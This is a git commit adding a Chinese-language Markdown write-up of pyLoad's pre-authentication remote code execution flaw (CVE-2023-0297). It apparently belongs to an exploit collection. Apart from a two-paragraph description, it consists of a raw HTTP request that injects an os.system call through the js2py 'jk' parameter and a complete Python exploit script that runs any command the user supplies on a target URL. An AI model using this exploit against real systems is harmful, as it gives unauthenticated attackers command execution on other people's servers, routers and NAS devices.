Create pyLoad远程代码执行漏洞.md

2025-02-27 04:39:25 +00:00 · 2023-11-23 21:32:32 +08:00 · 2023-11-23 21:32:32 +08:00 · ab48be5a3e
commit ab48be5a3e
parent 52ddc1666d
1 changed files with 73 additions and 0 deletions
--- a/pyLoad远程代码执行漏洞.md
+++ b/pyLoad远程代码执行漏洞.md
@ -0,0 +1,73 @@
+
+## pyLoad远程代码执行漏洞
+pyLoad是一个用 Python 编写的免费和开源下载管理器，可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。
+
+pyLoad 存在代码注入漏洞，未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
+
+## poc
+```
+POST flash/addcrypted2 HTTP/1.1
+Host:127.0.0.1
+Content-type: application/x-www-form-urlencoded
+
+jk=pyimport%20os;os.system("id");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
+
+```
+
+## exp脚本
+```python
+
+# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
+# Date: 06-10-2023
+# Credits: bAu @bauh0lz 
+# Exploit Author: Gabriel Lima (0xGabe)
+# Vendor Homepage: https://pyload.net/
+# Software Link: https://github.com/pyload/pyload
+# Version: 0.5.0
+# Tested on: Ubuntu 20.04.6
+# CVE: CVE-2023-0297
+
+import requests, argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
+parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
+arguments = parser.parse_args()
+
+def doRequest(url):
+    try:
+        res = requests.get(url + '/flash/addcrypted2')
+        if res.status_code == 200:
+            return True
+        else:
+            return False
+
+    except requests.exceptions.RequestException as e:
+        print("[!] Maybe the host is offline :", e)
+        exit()
+
+def runExploit(url, cmd):
+    endpoint = url + '/flash/addcrypted2'
+    if " " in cmd:
+        validCommand = cmd.replace(" ", "%20")
+    else:
+        validCommand = cmd
+
+    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
+    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
+    print('[+] The exploit has be executeded in target machine. ')
+
+def main(targetUrl, Command):
+    print('[+] Check if target host is alive: ' + targetUrl)
+    alive = doRequest(targetUrl)
+    if alive == True:
+        print("[+] Host up, let's exploit! ")
+        runExploit(targetUrl,Command)
+    else:
+        print('[-] Host down! ')
+
+if(arguments.url != None and arguments.cmd != None):
+    targetUrl = arguments.url
+    Command = arguments.cmd
+    main(targetUrl, Command)
+```